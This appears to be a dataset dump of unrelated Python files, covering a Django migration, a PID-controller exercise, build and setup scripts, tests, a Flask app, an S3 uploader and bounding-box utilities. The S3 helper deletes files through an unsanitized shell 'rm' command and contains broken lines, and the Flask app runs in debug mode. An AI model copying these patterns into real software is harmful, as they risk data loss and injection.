content
stringlengths 5
1.05M
|
---|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.27 on 2020-02-19 01:58
from __future__ import unicode_literals
from corehq.sql_db.operations import RawSQLMigration
from django.db import migrations, models
from custom.icds_reports.const import SQL_TEMPLATES_ROOT
migrator = RawSQLMigration((SQL_TEMPLATES_ROOT, 'database_views'))
class Migration(migrations.Migration):
dependencies = [
('icds_reports', '0170_auto_20200210_1142'),
]
operations = [
migrations.AddField(
model_name='aggservicedeliveryreport',
name='children_0_3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='aggservicedeliveryreport',
name='children_3_5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='aggservicedeliveryreport',
name='gm_0_3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='aggservicedeliveryreport',
name='gm_3_5',
field=models.IntegerField(null=True),
)
]
|
# ----------------
# User Instructions
#
# Implement twiddle as shown in the previous two videos.
# Your accumulated error should be very small!
#
# You don't have to use the exact values as shown in the video
# play around with different values! This quiz isn't graded just see
# how low of an error you can get.
#
# Try to get your error below 1.0e-10 with as few iterations
# as possible (too many iterations will cause a timeout).
#
# No cheating!
# ------------
import random
import numpy as np
import matplotlib.pyplot as plt
# ------------------------------------------------
#
# this is the Robot class
#
class Robot(object):
def __init__(self, length=20.0):
"""
Creates robot and initializes location/orientation to 0, 0, 0.
"""
self.x = 0.0
self.y = 0.0
self.orientation = 0.0
self.length = length
self.steering_noise = 0.0
self.distance_noise = 0.0
self.steering_drift = 0.0
def set(self, x, y, orientation):
"""
Sets a robot coordinate.
"""
self.x = x
self.y = y
self.orientation = orientation % (2.0 * np.pi)
def set_noise(self, steering_noise, distance_noise):
"""
Sets the noise parameters.
"""
# makes it possible to change the noise parameters
# this is often useful in particle filters
self.steering_noise = steering_noise
self.distance_noise = distance_noise
def set_steering_drift(self, drift):
"""
Sets the systematical steering drift parameter
"""
self.steering_drift = drift
def move(self, steering, distance, tolerance=0.001, max_steering_angle=np.pi / 4.0):
"""
steering = front wheel steering angle, limited by max_steering_angle
distance = total distance driven, most be non-negative
"""
if steering > max_steering_angle:
steering = max_steering_angle
if steering < -max_steering_angle:
steering = -max_steering_angle
if distance < 0.0:
distance = 0.0
# apply noise
steering2 = random.gauss(steering, self.steering_noise)
distance2 = random.gauss(distance, self.distance_noise)
# apply steering drift
steering2 += self.steering_drift
# Execute motion
turn = np.tan(steering2) * distance2 / self.length
if abs(turn) < tolerance:
# approximate by straight line motion
self.x += distance2 * np.cos(self.orientation)
self.y += distance2 * np.sin(self.orientation)
self.orientation = (self.orientation + turn) % (2.0 * np.pi)
else:
# approximate bicycle model for motion
radius = distance2 / turn
cx = self.x - (np.sin(self.orientation) * radius)
cy = self.y + (np.cos(self.orientation) * radius)
self.orientation = (self.orientation + turn) % (2.0 * np.pi)
self.x = cx + (np.sin(self.orientation) * radius)
self.y = cy - (np.cos(self.orientation) * radius)
def __repr__(self):
return '[x=%.5f y=%.5f orient=%.5f]' % (self.x, self.y, self.orientation)
############## ADD / MODIFY CODE BELOW ####################
# ------------------------------------------------------------------------
#
# run - does a single control run
def make_robot():
"""
Resets the robot back to the initial position and drift.
You'll want to call this after you call `run`.
"""
robot = Robot()
robot.set(0, 1, 0)
robot.set_steering_drift(10 / 180 * np.pi)
return robot
# NOTE: We use params instead of tau_p, tau_d, tau_i
def run(robot, params, n=100, speed=1.0):
x_trajectory = []
y_trajectory = []
err = 0
prev_cte = robot.y
int_cte = 0
for i in range(2 * n):
cte = robot.y
diff_cte = cte - prev_cte
int_cte += cte
prev_cte = cte
steer = -params[0] * cte - params[1] * diff_cte - params[2] * int_cte
robot.move(steer, speed)
x_trajectory.append(robot.x)
y_trajectory.append(robot.y)
if i >= n:
err += cte ** 2
return x_trajectory, y_trajectory, err / n
# Make this tolerance bigger if you are timing out!
def twiddle(tol=0.2):
# Don't forget to call `make_robot` before every call of `run`!
p = [0, 0, 0]
dp = [1, 1, 1]
robot = make_robot()
x_trajectory, y_trajectory, best_err = run(robot, p)
# TODO: twiddle loop here
it = 0
while sum(dp) > tol:
print("Iteration {}, best error = {}".format(it, best_err))
for i in range(len(p)):
p[i] += dp[i]
robot = make_robot()
x_trajectory, y_trajectory, err = run(robot, p)
if err < best_err:
best_err = err
dp[i] *= 1.1
else:
p[i] -= 2 * dp[i]
robot = make_robot()
x_trajectory, y_trajectory, err = run(robot, p)
if err < best_err:
best_err = err
dp[i] *= 1.1
else:
p[i] += dp[i]
dp[i] *= 0.9
it += 1
return p, best_err
# P controller
def run_p(robot, tau, n=100, speed=1.0):
x_trajectory = []
y_trajectory = []
for i in range(2 * n):
cte = robot.y
steer = -tau * cte
robot.move(steer, speed)
# Print some debug messages
#if i < 20:
# print(robot.__repr__())
x_trajectory.append(robot.x)
y_trajectory.append(robot.y)
return x_trajectory, y_trajectory
# PD Controller
def run_pd(robot, tau_p, tau_d, n=100, speed=1.0):
x_trajectory = []
y_trajectory = []
# TODO: your code here
x_trajectory = []
y_trajectory = []
prev_cte = robot.y
for i in range(2 * n):
cte = robot.y
diff_cte = cte - prev_cte
prev_cte = cte
steer = -tau_p * cte - tau_d * diff_cte
robot.move(steer, speed)
# Print some debug messages
#if i < 20:
# print(robot.__repr__())
x_trajectory.append(robot.x)
y_trajectory.append(robot.y)
return x_trajectory, y_trajectory
# PID Controller
def run_pid(robot, tau_p, tau_d, tau_i, n=100, speed=1.0):
x_trajectory = []
y_trajectory = []
# TODO: your code here
prev_cte = robot.y
int_cte = 0
for i in range(2 * n):
cte = robot.y
diff_cte = cte - prev_cte
prev_cte = cte
int_cte += cte
steer = -tau_p * cte - tau_d * diff_cte - tau_i * int_cte
robot.move(steer, speed)
# Print some debug messages
#if i < 20:
# print(robot.__repr__())
x_trajectory.append(robot.x)
y_trajectory.append(robot.y)
return x_trajectory, y_trajectory
params, err = twiddle()
print("Final twiddle error = {}".format(err))
robot = make_robot()
x_trajectory, y_trajectory, err = run(robot, params)
n = len(x_trajectory)
# P Controller
print("------------ P Controller --------------")
robot_p = make_robot()
x_trajectory_p, y_trajectory_p = run_p(robot_p, 0.2)
n_p = len(x_trajectory_p)
# PD Controller
print("------------ PD Controller -------------")
robot_pd = make_robot()
x_trajectory_pd, y_trajectory_pd = run_pd(robot_pd, 0.2, 3.0)
n_pd = len(x_trajectory_pd)
# PD Controller
print("------------ PID Controller ------------")
robot_pid = make_robot()
x_trajectory_pid, y_trajectory_pid = run_pid(robot_pid, 0.2, 3.0, 0.004)
n_pid = len(x_trajectory_pid)
fig, ax = plt.subplots(1, 1, figsize=(12, 8))
ax.plot(x_trajectory_p, y_trajectory_p, 'b', label='P controller')
ax.plot(x_trajectory_pd, y_trajectory_pd, 'g', label='PD controller')
ax.plot(x_trajectory_pid, y_trajectory_pid, 'c', label='PID controller')
ax.plot(x_trajectory, y_trajectory, 'm', label='Twiddle PID controller')
ax.plot(x_trajectory, np.zeros(n), 'r', label='reference')
ax.legend(loc='lower right') |
#!/usr/bin/env python3
'''
This script will set up the current folder with its dependencies
'''
import os
import argparse
import subprocess
from _load_vars import load_vars
GN_ARGS = 'target_os = "android"\ntarget_cpu = "arm64"\n'.encode('utf-8')
parser = argparse.ArgumentParser(
description='Initialize the current directory with dependencies'
)
parser.add_argument(
'--build',
action="store_true",
default=False,
help="Whether to prepare the source tree for a build"
)
parser.add_argument(
'--depot_tools_repo',
default="https://chromium.googlesource.com/chromium/tools/depot_tools.git",
help="The git repo for chromium build tools"
)
parser.add_argument(
'--bromite_repo',
default="https://github.com/bromite/bromite.git",
help="The git repo for bromite"
)
args = load_vars(parser)
chromium = args["chromium"]
chromium_root = args["chromium_root"]
bromite = args["bromite"]
build_name = args["build_name"]
build_path = args["build_path"]
depot_tools = args["depot_tools"]
root = args["root"]
env = args["env"]
build = args["build"]
depot_tools_repo = args["depot_tools_repo"]
bromite_repo = args["bromite_repo"]
bromite_build_folder = os.path.join(bromite, 'build')
# Set up ./bromite if it doesn't exist
if not os.path.exists(bromite):
print('Cloning bromite repo')
subprocess.run(f'git clone {bromite_repo}',
cwd=root, shell=True, check=True)
bromite_checkout_script = os.path.join(root, 'checkout_bromite_tag.py')
subprocess.run(bromite_checkout_script, cwd=root, shell=True, check=True)
else:
print("Skipping bromite directory, already exists")
# Set up ./depot_tools if it doesn't exist
if not os.path.exists(depot_tools):
print('Cloning depot_tools')
subprocess.run(f'git clone {depot_tools_repo}',
cwd=root, shell=True, check=True)
else:
print("Skipping depot_tools, already exists")
# Set up ./chromium/src if it doesn't exist
if not os.path.exists(chromium_root):
print("Fetching chromium source")
os.makedirs(chromium_root)
subprocess.run('fetch --nohooks --no-history android',
cwd=chromium_root, shell=True, check=True, env=env)
if build:
print('Installing build dependencies')
install_deps = os.path.join(
chromium, "build/install-build-deps-android.sh")
subprocess.run(f'{install_deps}', cwd=chromium_root,
shell=True, check=True, env=env)
print('Running hooks for third party libraries')
subprocess.run('gclient runhooks',
cwd=chromium_root, shell=True, check=True, env=env)
else:
print("Skipping build dependencies, enable with --build")
else:
print("Skipping chromium root, already exists")
# Set up ./chromium/src/out/Default if it doesn't exist
if build and not os.path.exists(os.path.join(chromium, build_path)):
print('Preparing chromium output directory')
subprocess.run(
f'gn args {build_path}',
input=GN_ARGS, cwd=chromium_root, shell=True, check=True, env=env)
else:
print("Skipping chromium output directory, exists or not building")
print("Running Bromite Patch Script")
bromite_patch_script = os.path.join(root, 'apply_bromite_patches.py')
subprocess.run(bromite_patch_script, cwd=root, shell=True, check=True)
print("Running Agregore Patch Script")
agregore_patch_script = os.path.join(root, 'apply_agregore_patches.py')
subprocess.run(agregore_patch_script, cwd=root, shell=True, check=True)
print("Running Download IPFS Daemon Script")
download_ipfs_daemon_script = os.path.join(root, 'download_ipfs_daemon.py')
subprocess.run(download_ipfs_daemon_script, cwd=root, shell=True, check=True)
print("Running Download WifiAutoConnect Script")
download_wifi_autoconnect_script = os.path.join(root, 'download_wifi_autoconnect.py')
subprocess.run(download_wifi_autoconnect_script, cwd=root, shell=True, check=True)
print("Really Done!")
|
VERSION = (1, 3, 5)
__version__ = '.'.join(str(i) for i in VERSION)
|
from pathlib import Path
from unittest import mock
from typing import Callable
import json
import pytest
from my_utils.decorators import cache
def test_cache_decorator_factory(tmpdir):
m = mock.Mock()
hash_f = lambda f, args, _: hash(f"{f.__name__}-{json.dumps(args)}")
@cache.cache_decorator_factory(Path(tmpdir) / "cache", hash_f)
def add_one(a: int) -> int:
m()
return a + 1
assert add_one(1) == 2 # return value is cached
assert add_one(1) == 2 # return value is read, no function call
assert m.call_count == 1 # second call didn't increase the counter
assert add_one(2) == 3
assert m.call_count == 2
@mock.patch("my_utils.decorators.cache.settings.cache_dir")
def test_shallow_cache(cache_dir, tmpdir):
m = mock.Mock()
cache_dir.return_value = Path(tmpdir) / "cache"
@cache.shallow_cache
def sub_one(a: int) -> int:
m()
return a - 1
assert sub_one(2) == 1 # return value is cached
assert sub_one(2) == 1 # return value is read, no function call
assert m.call_count == 1 # second call didn't increase the counter
assert sub_one(5) == 4
assert m.call_count == 2
@mock.patch("my_utils.decorators.cache.settings.cache_dir")
def test_shallow_cache_functiontype(cache_dir, tmpdir):
m = mock.Mock()
cache_dir.return_value = Path(tmpdir) / "cache"
@cache.shallow_cache
def call_f(f: Callable, a: int) -> int:
m()
return f(a)
with pytest.warns(UserWarning, match="Ignoring callable"):
assert call_f(lambda x: x + 10, 1) == 11 # return value is cached
assert call_f(lambda x: x + 10, 1) == 11 # return value is read, no call
assert m.call_count == 1 # second call didn't increase the counter
# ! shallow_cache ignores input callables
assert call_f(lambda x: x + 11, 1) == 11 # return value is the one from above
assert m.call_count == 1
assert call_f(lambda x: x + 10, 2) == 12
assert m.call_count == 2
|
from floodsystem.datafetcher import fetch_measure_levels
from floodsystem.stationdata import build_station_list, update_water_levels
from floodsystem.flood import stations_highest_rel_level, stations_level_over_threshold
stations = build_station_list()
update_water_levels(stations)
def test_stations_level_over_threshold():
'''Test stations with relative levels above threshold in descending order'''
test_stations = stations_level_over_threshold(stations, 0.8)
for x in test_stations:
assert x[1] > 0.8
for x in range(len(test_stations)-1):
assert test_stations[x][1] >= test_stations[x+1][1]
def test_stations_highest_rel_level():
'''Test N stations with highest relative water level in descending order'''
test_stations = stations_highest_rel_level(stations,10)
for x in range(len(test_stations)-1):
assert test_stations[x][1] >= test_stations[x+1][1] |
import os
from flask import Flask, render_template, request
from MovieClass import MovieClass
#initialize the movie class and randomize the internal list
movie = MovieClass()
movie.import_top250()
movie.randomize()
app = Flask(__name__)
pictures = os.path.join('static','pics') #load pictures folder to flask
app.config['UPLOAD_FOLDER'] = pictures
# Variables for active HTML and background for all
# Consider these the default return settings
backPic = os.path.join(pictures, 'background.jpg')
currentHTML = 'index.html'
flavortext = ''
#Returns a render template with all the movie details that "movie" currently
#points to. Uses the passed html file and background. Used to make code
#easier to read.
def movie_details(html, bg, text):
return render_template(html, movie_title = movie.title(),
movie_rating = movie.rating(), user_image = movie.cover_url(),
background = bg, movie_plot_summary = movie.plot_summary(),
movie_genres = movie.genres(), flavor_text=text)
# defining a route
@app.route("/", methods=['GET', 'POST', 'PUT']) # decorator
def home(): # route handler function
# Set the local variable definitions to match global
global currentHTML
global backPic
global flavortext
# Check if a movie or genre has been selected
if request.method == 'POST':
actionForm = request.form['action']
# Make sure default background is selected, and html is 'yes'
if actionForm == 'Yes!':
currentHTML = 'yes.html'
backPic = os.path.join(pictures, 'yes.jpg')
# Load next movie
# The html document to load should already be in the currentHTML var
elif actionForm == 'No.':
movie.next()
# Don't need to load next movie, since the current one is the first one
# Back sure background is set to default and html is 'no'
elif actionForm == 'Any movie for me':
movie.randomize()
currentHTML = 'no.html'
backPic = os.path.join(pictures, 'background.jpg')
# reset to default - index values
elif actionForm == 'Different genre' or actionForm == 'New flick':
currentHTML = 'index.html'
backPic = os.path.join(pictures, 'background.jpg')
# If we get to here then a specific genre has been selected
# The 'actionForm' variable contains the string name of that genre
# we use this to edit the flavortext and find the right background
else:
# Change to lowercase for ease of use
actionForm = actionForm.lower()
# Update the movie list to contain only the selected genre
movie.select_genre(actionForm)
movie.randomize()
currentHTML = "genre_selected.html"
backPic = os.path.join(pictures, (actionForm + ".jpg"))
flavortext = "Is this the " + actionForm + " you're looking for?"
return movie_details(currentHTML, backPic, flavortext)
#debug mode on
app.run(debug = True) |
from ..item import Item
from ..writer import Writer
import yaml
content_type = "application/yaml"
def load(self, text):
"""Item from YAML representation."""
self.__dict__ = yaml.safe_load(text)
def dump(self):
"""Item in YAML representation."""
return yaml.dump(self.primitive, default_flow_style=False)
class Writer(Writer):
"""Write YAML array."""
def __init__(self, stream, sep="\n"):
self.stream = stream
self.sep = sep
self.sol = ""
def write(self, item):
self.stream.write(
self.sol + yaml.dump([item.primitive], default_flow_style=False)
)
self.sol = self.sep
Item.yaml = property(dump, load)
|
#!/usr/bin/env python
#encoding=utf-8
# setup.py
# This file is part of PSR Registration Shuffler
#
# Copyright (C) 2008 - Dennis Schulmeister <dennis -at- ncc-1701a.homelinux.net>
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# It is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this file. If not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor,
# Boston, MA 02110-1301 USA
'''
PURPOSE
=======
This is the install script. It employs distutils for system-wide installation
and packaging.
TODO
====
* More sensible detection of data directories (data, l18n, ...) (low priority)
'''
# Provide global dummy _() function since we're not using gettext here.
# If this is left out importing modules from src won't work.
import src.translation
src.translation.initDummy()
# Import modules
from distutils.core import setup
from glob import glob
import sys
import os
from src import const
# Set default options if no options are given by user. Otherwise the setup()
# function won't return without giving us a chance to cleanup afterwards.
if len(sys.argv) < 2:
sys.argv.append("--help")
# Package meta-data
NAME = const.progname
VERSION = const.version
DESCRIPTION = const.description
LICENCE = const.licence
AUTHOR = const.author
AUTHOR_EMAIL = const.author_email
URL = const.url
# See http://pypi.python.org/pypi?%3Aaction=list_classifiers for a
# complete list of available classifiers
CLASSIFIERS = [
"Development Status :: 4 - Beta",
"Environment :: X11 Applications :: Gnome",
"Environment :: X11 Applications :: GTK",
"Intended Audience :: End Users/Desktop",
"License :: OSI Approved :: GNU General Public License (GPL)",
"Operating System :: POSIX",
"Programming Language :: Python",
"Topic :: Multimedia :: Sound/Audio :: Editors",
]
# Package dependencies
REQUIRES = [
"gettext",
"optparse",
"pygtk (>=2.0)",
"kiwi (>=1.9.19)"
]
# List of packages, package directories, scripts and additional data
SCRIPTS = [
"psrregshuffle"
]
PACKAGES = [
"psrregshuffle",
"psrregshuffle.regbank",
"psrregshuffle.regfile",
"psrregshuffle.exportsetlist",
]
PACKAGE_DIR = {
"psrregshuffle": "src/",
"psrregshuffle.regbank": "src/regbank",
"psrregshuffle.regfile": "src/regfile",
"psrregshuffle.exportsetlist": "src/exportsetlist",
}
DATA_SRC_DIR = os.path.join("data", "*")
DATA_DST_DIR = os.path.join("share", const.techname)
DATA_FILES = [
(DATA_DST_DIR, glob(DATA_SRC_DIR)),
]
# Build man pages
# NOTE: Unfortunately there is no (easy) way to limit this to the distutils
# commands "build" or "install". So it gets executed every time the script
# runs.
cwd = os.getcwd()
os.chdir(os.path.join("doc", "man"))
#import doc.man.make
os.system("./make.py")
os.chdir(cwd)
# Add man pages to list of data files
manBuildDir = os.path.join("doc", "man", "build")
manInstallDir = os.path.join(sys.prefix, "share", "man")
for root, dirs, files in os.walk(manBuildDir):
# Assemble list of source files per directory
srcFiles = []
for file in files:
srcFiles.append(os.path.join(root, file))
if not srcFiles:
continue
# Derive destination directory name
dstDir = root.replace(manBuildDir, manInstallDir)
# Append files to list of data files
entry = (dstDir, srcFiles)
DATA_FILES.append(entry)
# Build language dependant catalog files (l18n)
# NOTE: Unfortunately there is no (easy) way to limit this to the distutils
# commands "build" or "install". So it gets executed every time the script
# runs.
cwd = os.getcwd()
os.chdir("l18n")
#import l18n.import_translations
os.system("./import_translations.py")
os.chdir(cwd)
# Add l18n files to list of data files
l18nBuildDir = os.path.join("l18n", "build")
l18nInstallDir = os.path.join(sys.prefix, "share", "locale")
for root, dirs, files in os.walk(l18nBuildDir):
# Assemble list of source files per directory
srcFiles = []
for file in files:
srcFiles.append(os.path.join(root, file))
if not srcFiles:
continue
# Derive destination directory name
dstDir = root.replace(l18nBuildDir, l18nInstallDir)
# Append files to list of data files
entry = (dstDir, srcFiles)
DATA_FILES.append(entry)
# Start setup-script
print
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
license=LICENCE,
url=URL,
classifiers=CLASSIFIERS,
scripts=SCRIPTS,
packages=PACKAGES,
package_dir=PACKAGE_DIR,
data_files=DATA_FILES,
requires=REQUIRES
)
# Clean up automatically generated helper files.
# HINT: This is especially importand if the script runs with root privileges.
# Otherwise helper scripts couldn't be run with user-privileges afterwards.
cwd = os.getcwd()
os.chdir(os.path.join("doc", "man"))
os.system("./make.py --clean")
os.chdir(cwd)
cwd = os.getcwd()
os.chdir("l18n")
os.system("./import_translations.py --clean")
os.chdir(cwd)
|
import os
import boto3
media_url = './media/unknown'
target = ''
bucket_name = 'korestate'
s3 = boto3.resource('s3')
abs_curdir = os.path.abspath('.')
dir_cointents = os.path.join(abs)
def write_all(target = media_url, to_bucket = bucket_name, usr = 'images'):
dir_contents = os.listdir(target)
print "s3handler WRITING TO::: {}".format(dir_contents)
for f in dir_contents:
FILE_PATH = os.path.join(target,f)
if os.path.isfile(FILE_PATH):
send_file = open(FILE_PATH,'rb')
s3.Object(to_bucket, os.path.join(usr,f)).put(Body=send_file)
else:
pass
def flush(dir_to_flush = media_url):
os.system('rm {}/*'.format(dir_to_flush))
|
# import the necessary packages
import numpy as np
# Felzenszwalb et al.
def non_max_suppression_slow(boxes, overlapThresh):
# if there are no boxes, return an empty list
if len(boxes) == 0:
return []
# initialize the list of picked indexes
pick = []
# grab the coordinates of the bounding boxes
x1 = boxes[:,0]
y1 = boxes[:,1]
x2 = boxes[:,2]
y2 = boxes[:,3]
# compute the area of the bounding boxes and sort the bounding
# boxes by the bottom-right y-coordinate of the bounding box
area = (x2 - x1 + 1) * (y2 - y1 + 1)
idxs = np.argsort(y2)
# keep looping while some indexes still remain in the indexes
# list
while len(idxs) > 0:
# grab the last index in the indexes list, add the index
# value to the list of picked indexes, then initialize
# the suppression list (i.e. indexes that will be deleted)
# using the last index
last = len(idxs) - 1
i = idxs[last]
pick.append(i)
suppress = [last]
# loop over all indexes in the indexes list
for pos in xrange(0, last):
# grab the current index
j = idxs[pos]
# find the largest (x, y) coordinates for the start of
# the bounding box and the smallest (x, y) coordinates
# for the end of the bounding box
xx1 = max(x1[i], x1[j])
yy1 = max(y1[i], y1[j])
xx2 = min(x2[i], x2[j])
yy2 = min(y2[i], y2[j])
# compute the width and height of the bounding box
w = max(0, xx2 - xx1 + 1)
h = max(0, yy2 - yy1 + 1)
# compute the ratio of overlap between the computed
# bounding box and the bounding box in the area list
overlap1 = float(w * h) / area[j]
overlap2 = float(w * h) / area[i]
#IoU = float(w * h) / (area[i] + area[j] - w * h)
y_midpoint_distance = abs((y1[i]+y2[i])/2. - (y1[j]+y2[j])/2.)
yi_height = y2[i] - y1[i]
# if there is sufficient overlap, suppress the
# current bounding box
if (y_midpoint_distance < 5*yi_height/18. and (overlap1 > 0.5 or overlap2 > 0.5)) or \
(5*yi_height/18.< y_midpoint_distance < yi_height/2. and (overlap1 > 0.4 or overlap2 > 0.4)) or \
(y_midpoint_distance > yi_height/2. and (overlap1 > 0.3 or overlap2 > 0.3)):
suppress.append(pos)
# delete all indexes from the index list that are in the
# suppression list
idxs = np.delete(idxs, suppress)
# return only the bounding boxes that were picked
return boxes[pick]
def non_max_suppression_fast(boxes, overlapThresh):
# if there are no boxes, return an empty list
if len(boxes) == 0:
return []
# if the bounding boxes integers, convert them to floats --
# this is important since we'll be doing a bunch of divisions
if boxes.dtype.kind == "i":
boxes = boxes.astype("float")
# initialize the list of picked indexes
pick = []
# grab the coordinates of the bounding boxes
x1 = boxes[:,0]
y1 = boxes[:,1]
x2 = boxes[:,2]
y2 = boxes[:,3]
# compute the area of the bounding boxes and sort the bounding
# boxes by the bottom-right y-coordinate of the bounding box
area = (x2 - x1 + 1) * (y2 - y1 + 1)
idxs = np.argsort(y2)
# keep looping while some indexes still remain in the indexes
# list
while len(idxs) > 0:
# grab the last index in the indexes list and add the
# index value to the list of picked indexes
last = len(idxs) - 1
i = idxs[last]
pick.append(i)
# find the largest (x, y) coordinates for the start of
# the bounding box and the smallest (x, y) coordinates
# for the end of the bounding box
xx1 = np.maximum(x1[i], x1[idxs[:last]])
yy1 = np.maximum(y1[i], y1[idxs[:last]])
xx2 = np.minimum(x2[i], x2[idxs[:last]])
yy2 = np.minimum(y2[i], y2[idxs[:last]])
# compute the width and height of the bounding box
w = np.maximum(0, xx2 - xx1 + 1)
h = np.maximum(0, yy2 - yy1 + 1)
# compute the ratio of overlap
overlap = (w * h) / area[idxs[:last]]
# delete all indexes from the index list that have
idxs = np.delete(idxs, np.concatenate(([last],
np.where(overlap > overlapThresh)[0])))
# return only the bounding boxes that were picked using the
# integer data type
return boxes[pick].astype("int")
def expansion(boundingBoxes):
bigRect = []
x1 = boundingBoxes[:,0]
x2 = boundingBoxes[:,2]
y1 = boundingBoxes[:,1]
y2 = boundingBoxes[:,3]
width_avg = sum(x2 - x1) / len(boundingBoxes)
height_avg = sum(y2 - y1) / len(boundingBoxes)
# print width_avg,height_avg
idxs_y2 = np.argsort(y2-(y2-y1)/2)
while len(idxs_y2) > 0:
pick = []
index = []
length = len(idxs_y2)
pick.append(idxs_y2[0])
index.append(0)
if(length > 1):
for pos in xrange(1, length):
pick.append(idxs_y2[pos])
index.append(pos)
if (y2[idxs_y2[pos]]-(y2[idxs_y2[pos]]-y1[idxs_y2[pos]])/2) - (y2[idxs_y2[pos-1]]-(y2[idxs_y2[pos - 1]]-y1[idxs_y2[pos - 1]])/2) >= 0.8*height_avg:
pick.pop()
index.pop()
break
idxs_y2 = np.delete(idxs_y2, index)
idx_x1 = np.argsort(x1[pick])
pick_sort = []
for i in range(0,len(pick)):
pick_sort.append(pick[idx_x1[i]])
while len(pick_sort) > 0:
pickx = []
index = []
length = len(pick_sort)
pickx.append(pick_sort[0])
index.append(0)
if(length > 1):
for pos in xrange(1, length):
pickx.append(pick_sort[pos])
index.append(pos)
if x1[pick_sort[pos]] - x1[pick_sort[pos - 1]] > 2.5 * width_avg:
pickx.pop()
index.pop()
break
pick_sort = np.delete(pick_sort, index)
if len(pickx) >= 4:
for ok in pickx:
bigRect.append([x1[ok],y1[ok],x2[ok],y2[ok]])
return bigRect
def readtxt(path,filename):
list=[]
for line in open(path):
name = line.split(':')[0]
if name == filename:
location = line.split(':')[1].split(' ')
for i in range(location.__len__()):
point = []
for j in range(4):
point.append(int(location[i].split(',')[j]))
list.append(point)
if len(list) == 0:
return []
else:
images = [(np.array(list))]
return images[0]
def judge(pick,pick_src,overlap):
if len(pick)==0 or len(pick_src)==0:
return []
index = []
x1 = pick[:,0]
y1 = pick[:,1]
x2 = pick[:,2]
y2 = pick[:,3]
src_x1 = pick_src[:,0]
src_y1 = pick_src[:,1]
src_x2 = pick_src[:,2]
src_y2 = pick_src[:,3]
area1 = (x2 - x1) * (y2 - y1)
area2 = (src_x2 - src_x1) * (src_y2 - src_y1)
for i in range(len(pick)):
for j in range(len(pick_src)):
endx = max(x2[i],src_x2[j])
startx = min(x1[i],src_x1[j])
width = (x2[i] - x1[i]) + (src_x2[j] - src_x1[j]) - (endx - startx)
endy = max(y2[i],src_y2[j])
starty = min(y1[i],src_y1[j])
height = (y2[i] - y1[i]) + (src_y2[j] - src_y1[j]) - (endy - starty)
if width <= 0 or height <= 0:
continue
area = width * height
if float(area)/area2[j] > overlap and float(area)/area1[i] > overlap:
index.append(i)
break
return pick[index]
|
import numbers
from scipy.stats import mode
import pandas as pd
import numpy as np
import datetime
from mlapp.utils.exceptions.framework_exceptions import UnsupportedFileType
class ClassificationFeatureEngineering(object):
def drop_features(self, data_df, features_to_drop=None):
"""
Dropping requested features
:param data_df: the DataFrame
:param features_to_drop: list of features names to drop
:return: data_df after dropping requested featuers
"""
if not features_to_drop:
features_to_drop = []
original_columns = data_df.columns
filtered_columns_to_drop = filter(lambda x: x in original_columns, features_to_drop)
return data_df.drop(filtered_columns_to_drop, axis=1)
def bin_continuous_features(self, data_df, features_to_bin=None):
"""
Bin continuous features by the configuration in 'features_to_bin'
:param data_df: the DataFrame
:param features_to_bin: configuration of bin
example:
"features_to_bin":[
{"name": "feature_name_1", "bins": [5, 15]},
{"name": "feature_name_2", "bins": [15, 23]}
]
:return: the DataFrame with requested features transformed
"""
if not features_to_bin:
features_to_bin = []
for feature_to_bin in features_to_bin:
if feature_to_bin['name'] in data_df.columns:
full_bins = [data_df[feature_to_bin['name']].min() - 1] + feature_to_bin['bins'] + [data_df[feature_to_bin['name']].max() + 1]
data_df[feature_to_bin['name']] = pd.cut(
data_df[feature_to_bin['name']],
bins=full_bins,
labels=range(len(full_bins) - 1)).astype(float)
return data_df
def handle_y_variable(self, data_df, variable_to_predict, options):
"""
Transform variable to predict by options given in config
:param data_df: the DataFrame containing all features and variable to predict
:param variable_to_predict: the variable to predict columns name
:param options: options containing the configuration of the transformation for the variable to predict
example:
"y_variable": {
"type": "binary", # binary/multi/continuous - string
"categories_labels": ["LABEL_1", "LABEL_2"], # category labels - list
"continuous_to_category_bins": [-0.5, 0.5, 1.5], # bins values - list
"label_to_predict": ["LABEL_1"] # target label to predict - list
},
:return: 'data_df' - without the variable to predict, 'final_y' - the variable to predict after transformation
"""
# y variable configurations
y_df = data_df[variable_to_predict]
final_y = pd.DataFrame()
y_variable_type = options['type']
target_label = options['label_to_predict']
# y variable is binary OR one vs all
if y_variable_type == 'binary' or (y_variable_type == 'multi' and len(target_label) == 1):
y_dummies = pd.get_dummies(y_df)
final_y = y_dummies[target_label[0]]
# y variable is multi class
elif y_variable_type == 'multi' and len(target_label) < len(y_df.unique()):
final_y = y_df.apply(lambda x: x if x in target_label else "other")
# Example for indexing the labels
# labels_y = final_y.copy()
# for i in range(len(target_model)):
# labels_y = labels_y.apply(lambda x: i + 1 if x == target_model[i] else x)
# final_y = labels_y.apply(lambda x: 0 if not type(x)==int else x)
elif y_variable_type == 'continuous':
bins = options["continuous_to_category_bins"]
labels = options["categories_labels"]
final_y = pd.cut(y_df, bins=bins, labels=labels)
else:
final_y = y_df
data_df = data_df.drop(variable_to_predict, axis=1)
return data_df, final_y
def transform_and_split_features_to_categorical_and_continuous(self, data, dates_format=None, auto_bin_continuous_features=False, max_categories_num=10):
"""
Transforming DataFrame features by their value types
:param data: the DataFrame
:param dates_format: date formats expected in the DataFrame
:param auto_bin_continuous_features: whether to bin continuous features automatically
:param max_categories_num: max unique values in a feature before deciding to auto bin
:return: the DataFrame with transformed date columns, lists of features by their type, and binned features
"""
if dates_format is None:
dates_format = ["%d/%m/%Y", "%Y-%m-%d"]
data_types = data.dtypes
today = datetime.datetime.now()
continuous_columns = []
continuous_bins = {}
categorical_columns = []
binary_columns = []
for feature, curr_type in data_types.iteritems():
mysql_type, date_format = self._convert_text_to_date_type(curr_type, feature, data, dates_format)
if mysql_type == "DATETIME": # converting features from datetime to time_passed_from_date
data[feature] = data[feature].apply(
